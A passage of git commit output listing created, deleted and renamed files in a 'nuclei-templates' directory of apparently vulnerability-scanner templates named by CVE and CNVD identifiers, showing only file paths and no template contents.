nuclei-templates/CVE-2021/CVE-2021-25052.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-25055.yaml create mode 100644 nuclei-templates/CVE-2021/CVE-2021-25074.yaml create mode 100644 nuclei-templates/CVE-2021/CVE-2021-25075.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-25085.yaml create mode 100644 nuclei-templates/CVE-2021/CVE-2021-25111.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-25112.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-25118.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-25120.yaml rename nuclei-templates/CVE-2021/{cve-2021-26086.yaml => CVE-2021-26086.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-26598.yaml create mode 100644 nuclei-templates/CVE-2021/CVE-2021-26702.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-27309.yaml rename nuclei-templates/CVE-2021/{cve-2021-27310.yaml => CVE-2021-27310.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-27519.yaml rename nuclei-templates/CVE-2021/{cve-2021-27931.yaml => CVE-2021-27931.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-28377.yaml rename nuclei-templates/CVE-2021/{cve-2021-29484.yaml => CVE-2021-29484.yaml} (100%) rename nuclei-templates/CVE-2021/{cve-2021-30049.yaml => CVE-2021-30049.yaml} (100%) rename nuclei-templates/CVE-2021/{cve-2021-31755.yaml => CVE-2021-31755.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-31800.yaml rename nuclei-templates/CVE-2021/{cve-2021-32618.yaml => CVE-2021-32618.yaml} (100%) rename nuclei-templates/CVE-2021/{cve-2021-32682.yaml => CVE-2021-32682.yaml} (100%) rename nuclei-templates/CVE-2021/{cve-2021-3297.yaml => CVE-2021-3297.yaml} (100%) rename nuclei-templates/CVE-2021/{cve-2021-33044.yaml => CVE-2021-33044.yaml} (100%) rename nuclei-templates/CVE-2021/{cve-2021-33357.yaml => CVE-2021-33357.yaml} (100%) rename nuclei-templates/CVE-2021/{cve-2021-3377.yaml => CVE-2021-3377.yaml} (100%) create mode 100644 nuclei-templates/CVE-2021/CVE-2021-34640.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-35587.yaml create mode 100644 nuclei-templates/CVE-2021/CVE-2021-36450.yaml rename nuclei-templates/CVE-2021/{cve-2021-3654.yaml => CVE-2021-3654.yaml} (100%) rename nuclei-templates/CVE-2021/{cve-2021-36749.yaml => CVE-2021-36749.yaml} (100%) create mode 100644 nuclei-templates/CVE-2021/CVE-2021-37416.yaml rename nuclei-templates/CVE-2021/{cve-2021-38751.yaml => CVE-2021-38751.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-39211.yaml rename nuclei-templates/CVE-2021/{cve-2021-39433.yaml => CVE-2021-39433.yaml} (100%) create mode 100644 nuclei-templates/CVE-2021/CVE-2021-40150.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-40323.yaml rename nuclei-templates/CVE-2021/{cve-2021-41349.yaml => CVE-2021-41349.yaml} (100%) create mode 100644 nuclei-templates/CVE-2021/CVE-2021-41691.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-42063.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-42071.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-43062.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-44077.yaml create mode 100644 nuclei-templates/CVE-2021/CVE-2021-44515.yaml rename nuclei-templates/CVE-2021/{cve-2021-44848.yaml => CVE-2021-44848.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-45428.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-46379.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-46381.yaml create mode 100644 nuclei-templates/CVE-2021/CVE-2021-46418.yaml create mode 100644 nuclei-templates/CVE-2021/CVE-2021-46419.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-46422.yaml rename nuclei-templates/CVE-2021/{CVE-2021-20031.yaml => cve-2021-20031.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-20124.yaml => cve-2021-20124.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/cve-2021-20150.yaml rename nuclei-templates/CVE-2021/{CVE-2021-20167.yaml => cve-2021-20167.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-20792.yaml => cve-2021-20792.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-21307.yaml => cve-2021-21307.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/cve-2021-21311.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-21402.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-21800.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-21816.yaml rename nuclei-templates/CVE-2021/{CVE-2021-21973.yaml => cve-2021-21973.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-21978.yaml => cve-2021-21978.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-22053.yaml => cve-2021-22053.yaml} (100%) create mode 100644 nuclei-templates/CVE-2021/cve-2021-22214.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-24226.yaml rename nuclei-templates/CVE-2021/{CVE-2021-24235.yaml => cve-2021-24235.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-24237.yaml => cve-2021-24237.yaml} (100%) create mode 100644 nuclei-templates/CVE-2021/cve-2021-24245.yaml rename nuclei-templates/CVE-2021/{CVE-2021-24288.yaml => cve-2021-24288.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-24298.yaml => cve-2021-24298.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-24316.yaml => cve-2021-24316.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-24320.yaml => cve-2021-24320.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-24340.yaml => cve-2021-24340.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/cve-2021-24370.yaml rename nuclei-templates/CVE-2021/{CVE-2021-24389.yaml => cve-2021-24389.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-24406.yaml => cve-2021-24406.yaml} (100%) create mode 100644 nuclei-templates/CVE-2021/cve-2021-24488.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-24510.yaml rename nuclei-templates/CVE-2021/{CVE-2021-24746.yaml => cve-2021-24746.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-24762.yaml => cve-2021-24762.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/cve-2021-24910.yaml delete mode 100644 nuclei-templates/CVE-2021/cve-2021-24926.yaml delete mode 100644 nuclei-templates/CVE-2021/cve-2021-24947.yaml rename nuclei-templates/CVE-2021/{CVE-2021-24987.yaml => cve-2021-24987.yaml} (100%) create mode 100644 nuclei-templates/CVE-2021/cve-2021-24991.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-25052.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-25055.yaml delete mode 100644 nuclei-templates/CVE-2021/cve-2021-25074.yaml delete mode 100644 nuclei-templates/CVE-2021/cve-2021-25075.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-25085.yaml delete mode 100644 nuclei-templates/CVE-2021/cve-2021-25111.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-25112.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-25118.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-25120.yaml rename nuclei-templates/CVE-2021/{CVE-2021-25281.yaml => cve-2021-25281.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-25646.yaml => cve-2021-25646.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-26247.yaml => cve-2021-26247.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-26475.yaml => cve-2021-26475.yaml} (100%) create mode 100644 nuclei-templates/CVE-2021/cve-2021-26598.yaml delete mode 100644 nuclei-templates/CVE-2021/cve-2021-26702.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-27309.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-27519.yaml rename nuclei-templates/CVE-2021/{CVE-2021-27561.yaml => cve-2021-27561.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-27748.yaml => cve-2021-27748.yaml} (100%) create mode 100644 nuclei-templates/CVE-2021/cve-2021-28377.yaml rename nuclei-templates/CVE-2021/{CVE-2021-29203.yaml => cve-2021-29203.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-29490.yaml => cve-2021-29490.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-29622.yaml => cve-2021-29622.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-3019.yaml => cve-2021-3019.yaml} (100%) create mode 100644 nuclei-templates/CVE-2021/cve-2021-31800.yaml rename nuclei-templates/CVE-2021/{CVE-2021-3223.yaml => cve-2021-3223.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-32305.yaml => cve-2021-32305.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-32819.yaml => cve-2021-32819.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-33544.yaml => cve-2021-33544.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-33564.yaml => cve-2021-33564.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-3374.yaml => cve-2021-3374.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-33904.yaml => cve-2021-33904.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-34370.yaml => cve-2021-34370.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/cve-2021-34640.yaml rename nuclei-templates/CVE-2021/{CVE-2021-34805.yaml => cve-2021-34805.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-35265.yaml => cve-2021-35265.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-35464.yaml => cve-2021-35464.yaml} (100%) create mode 100644 nuclei-templates/CVE-2021/cve-2021-35587.yaml rename nuclei-templates/CVE-2021/{CVE-2021-36260.yaml => cve-2021-36260.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-36380.yaml => cve-2021-36380.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/cve-2021-36450.yaml rename nuclei-templates/CVE-2021/{CVE-2021-37216.yaml => cve-2021-37216.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/cve-2021-37416.yaml rename nuclei-templates/CVE-2021/{CVE-2021-37538.yaml => cve-2021-37538.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-37589.yaml => cve-2021-37589.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-37704.yaml => cve-2021-37704.yaml} (100%) create mode 100644 nuclei-templates/CVE-2021/cve-2021-39211.yaml rename nuclei-templates/CVE-2021/{CVE-2021-39226.yaml => cve-2021-39226.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-39320.yaml => cve-2021-39320.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-39327.yaml => cve-2021-39327.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/cve-2021-40150.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-40323.yaml rename nuclei-templates/CVE-2021/{CVE-2021-40438.yaml => cve-2021-40438.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-40859.yaml => cve-2021-40859.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-40870.yaml => cve-2021-40870.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-41277.yaml => cve-2021-41277.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-41293.yaml => cve-2021-41293.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-41649.yaml => cve-2021-41649.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/cve-2021-41691.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-41773.yaml rename nuclei-templates/CVE-2021/{CVE-2021-41826.yaml => cve-2021-41826.yaml} (100%) create mode 100644 nuclei-templates/CVE-2021/cve-2021-42063.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-42071.yaml rename nuclei-templates/CVE-2021/{CVE-2021-42192.yaml => cve-2021-42192.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-42258.yaml => cve-2021-42258.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-42551.yaml => cve-2021-42551.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-42565.yaml => cve-2021-42565.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-42566.yaml => cve-2021-42566.yaml} (100%) create mode 100644 nuclei-templates/CVE-2021/cve-2021-43062.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-44077.yaml delete mode 100644 nuclei-templates/CVE-2021/cve-2021-44515.yaml rename nuclei-templates/CVE-2021/{CVE-2021-45043.yaml => cve-2021-45043.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-45232.yaml => cve-2021-45232.yaml} (100%) create mode 100644 nuclei-templates/CVE-2021/cve-2021-45428.yaml rename nuclei-templates/CVE-2021/{CVE-2021-46005.yaml => cve-2021-46005.yaml} (100%) create mode 100644 nuclei-templates/CVE-2021/cve-2021-46379.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-46381.yaml rename nuclei-templates/CVE-2021/{CVE-2021-46387.yaml => cve-2021-46387.yaml} (100%) create mode 100644 nuclei-templates/CVE-2021/cve-2021-46422.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-0140.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-0148.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-0149.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-0165.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-0271.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-0281.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-0381.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-0422.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-0437.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-0594.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-0599.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-0653.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-0656.yaml rename nuclei-templates/CVE-2022/{CVE-2022-0954.yaml => CVE-2022-0921.yaml} (100%) create mode 100644 nuclei-templates/CVE-2022/CVE-2022-0952.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-0963.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-1040.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-1392.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-1439.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-1724.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-1904.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-1906.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-21371.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-21500.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-21661.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-21705.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-2187.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-22963.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-22972.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-23808.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-23881.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-24124.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-2414.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-2446.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-24681.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-2488.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-24899.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-25323.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-25568.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-26135.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-26233.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-2633.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-26960.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-27849.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-28079.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-28219.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-29013.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-29014.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-29301.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-29303.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-29383.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-29455.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-29464.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-30777.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-31137.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-31268.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-31793.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-32026.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-32409.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-32430.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-34265.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-36883.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-41040.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-0140.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-0148.yaml delete mode 100644 nuclei-templates/CVE-2022/cve-2022-0149.yaml delete mode 100644 nuclei-templates/CVE-2022/cve-2022-0165.yaml rename nuclei-templates/CVE-2022/{CVE-2022-0201.yaml => cve-2022-0201.yaml} (100%) create mode 100644 nuclei-templates/CVE-2022/cve-2022-0271.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-0281.yaml delete mode 100644 nuclei-templates/CVE-2022/cve-2022-0381.yaml delete mode 100644 nuclei-templates/CVE-2022/cve-2022-0422.yaml rename nuclei-templates/CVE-2022/{CVE-2022-0432.yaml => cve-2022-0432.yaml} (100%) create mode 100644 nuclei-templates/CVE-2022/cve-2022-0437.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-0594.yaml delete mode 100644 nuclei-templates/CVE-2022/cve-2022-0599.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-0653.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-0656.yaml delete mode 100644 nuclei-templates/CVE-2022/cve-2022-0952.yaml delete mode 100644 nuclei-templates/CVE-2022/cve-2022-0963.yaml rename nuclei-templates/CVE-2022/{CVE-2022-1020.yaml => cve-2022-1020.yaml} (100%) create mode 100644 nuclei-templates/CVE-2022/cve-2022-1040.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-1392.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-1439.yaml rename nuclei-templates/CVE-2022/{CVE-2022-1609.yaml => cve-2022-1609.yaml} (100%) create mode 100644 nuclei-templates/CVE-2022/cve-2022-1724.yaml delete mode 100644 nuclei-templates/CVE-2022/cve-2022-1904.yaml delete mode 100644 nuclei-templates/CVE-2022/cve-2022-1906.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-21371.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-21500.yaml delete mode 100644 nuclei-templates/CVE-2022/cve-2022-21705.yaml delete mode 100644 nuclei-templates/CVE-2022/cve-2022-2187.yaml rename nuclei-templates/CVE-2022/{CVE-2022-22536.yaml => cve-2022-22536.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2022/cve-2022-22963.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-22972.yaml rename nuclei-templates/CVE-2022/{CVE-2022-23178.yaml => cve-2022-23178.yaml} (100%) rename nuclei-templates/CVE-2022/{CVE-2022-23347.yaml => cve-2022-23347.yaml} (100%) rename nuclei-templates/CVE-2022/{CVE-2022-23779.yaml => cve-2022-23779.yaml} (100%) create mode 100644 nuclei-templates/CVE-2022/cve-2022-23808.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-23881.yaml rename nuclei-templates/CVE-2022/{CVE-2022-24112.yaml => cve-2022-24112.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2022/cve-2022-24124.yaml rename nuclei-templates/CVE-2022/{CVE-2022-24260.yaml => cve-2022-24260.yaml} (100%) create mode 100644 nuclei-templates/CVE-2022/cve-2022-24681.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-2488.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-24899.yaml rename nuclei-templates/CVE-2022/{CVE-2022-24990.yaml => cve-2022-24990.yaml} (100%) create mode 100644 nuclei-templates/CVE-2022/cve-2022-25323.yaml rename nuclei-templates/CVE-2022/{CVE-2022-26134.yaml => cve-2022-26134.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2022/cve-2022-26135.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-26233.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-26960.yaml delete mode 100644 nuclei-templates/CVE-2022/cve-2022-27849.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-28079.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-28219.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-29014.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-29301.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-29303.yaml delete mode 100644 nuclei-templates/CVE-2022/cve-2022-29383.yaml delete mode 100644 nuclei-templates/CVE-2022/cve-2022-29455.yaml delete mode 100644 nuclei-templates/CVE-2022/cve-2022-29464.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-30777.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-31268.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-31793.yaml rename nuclei-templates/CVE-2022/{CVE-2022-32007.yaml => cve-2022-32007.yaml} (100%) rename nuclei-templates/CVE-2022/{CVE-2022-32025.yaml => cve-2022-32025.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2022/cve-2022-32026.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-32409.yaml rename nuclei-templates/CVE-2022/{CVE-2022-34047.yaml => cve-2022-34047.yaml} (100%) rename nuclei-templates/CVE-2022/{CVE-2022-35416.yaml => cve-2022-35416.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2022/cve-2022-36883.yaml create mode 100644 nuclei-templates/CVE-2023/CVE-2023-0297.yaml create mode 100644 nuclei-templates/CVE-2023/CVE-2023-23333.yaml rename nuclei-templates/CVE-2023/{Cve-2023-23752.yaml => CVE-2023-23752.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2023/CVE-2023-25194.yaml create mode 100644 nuclei-templates/CVE-2023/CVE-2023-26256.yaml create mode 100644 nuclei-templates/CVE-2023/CVE-2023-2825.yaml create mode 100644 nuclei-templates/CVE-2023/CVE-2023-38992.yaml delete mode 100644 nuclei-templates/CVE-2023/CVE-2023-51467.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-1183.yaml rename nuclei-templates/{Other/gradio-CVE-2024-1561.yaml => CVE-2024/CVE-2024-1561.yaml} (100%) rename nuclei-templates/{Other/gradio-CVE-2024-1728.yaml => CVE-2024/CVE-2024-1728.yaml} (100%) create mode 100644 nuclei-templates/CVE-2024/CVE-2024-23167.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-3673.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-37084.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-3899.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-41667.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-45269.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-45270.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-45429.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-45625.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-5561.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-5567.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-5628.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-5789.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-5867.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-5869.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-5870.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-5884.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-6020.yaml delete mode 100644 nuclei-templates/CVE-2024/CVE-2024-6088.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-6544.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-6792.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-6888.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-6889.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-6910.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-7132.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-7354.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-7423.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-7716.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-7888.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-7891.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-7955.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-8031.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-8242.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-8269.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-8522.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-8529.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-8622.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-8656.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-8663.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-8664.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-8665.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-8714.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-8730.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-8731.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-8732.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-8734.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-8737.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-8742.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-8747.yaml delete mode 100644 nuclei-templates/Other/0xlfi2.yaml delete mode 100644 nuclei-templates/Other/0xlfifuzz1.yaml create mode 100644 nuclei-templates/Other/3cx-management-console-2.yaml delete mode 100644 nuclei-templates/Other/3cx-management-console.yaml create mode 100644 nuclei-templates/Other/3cx.yaml rename nuclei-templates/Other/{3gmeeting-fileRead.yaml => 3gmeeting-fileread.yaml} (100%) delete mode 100644 nuclei-templates/Other/403-bypass_method.yaml delete mode 100644 nuclei-templates/Other/403-bypass_xheaders.yaml delete mode 100644 nuclei-templates/Other/403-bypass_xrewriteurl.yaml rename nuclei-templates/Other/{74cms-sqli-9.yaml => 74cms-sqli-10.yaml} (100%) create mode 100644 nuclei-templates/Other/74cms-sqli-8.yaml create mode 100644 nuclei-templates/Other/ApacheSolr-SSRF-1.yaml create mode 100644 nuclei-templates/Other/ApacheSolr-SSRF-2.yaml create mode 100644 nuclei-templates/Other/ApacheSolr-SSRF-3.yaml create mode 100644 nuclei-templates/Other/ApacheSolr-SSRF-4.yaml create mode 100644 nuclei-templates/Other/ApacheSolr-SSRF-5.yaml create mode 100644 nuclei-templates/Other/ApacheSolr-SSRF-6.yaml create mode 100644 nuclei-templates/Other/ApacheStruts-RCE.yaml create mode 100644 nuclei-templates/Other/CNNVD-200705-315.yaml rename nuclei-templates/Other/{cnvd-2019-01348-1040.yaml => CNVD-2019-01348.yaml} (100%) create mode 100644 nuclei-templates/Other/CNVD-2019-19299.yaml create mode 100644 nuclei-templates/Other/CNVD-2020-23735.yaml delete mode 100644 nuclei-templates/Other/CNVD-2020-46552.yaml delete mode 100644 nuclei-templates/Other/CNVD-2020-67113.yaml delete mode 100644 nuclei-templates/Other/CNVD-2020-68596.yaml create mode 100644 nuclei-templates/Other/CNVD-2021-01931.yaml create mode 100644 nuclei-templates/Other/CNVD-2021-10543.yaml delete mode 100644 nuclei-templates/Other/CNVD-2021-14536.yaml delete mode 100644 nuclei-templates/Other/CNVD-2021-15822.yaml create mode 100644 nuclei-templates/Other/CNVD-2021-15824.yaml delete mode 100644 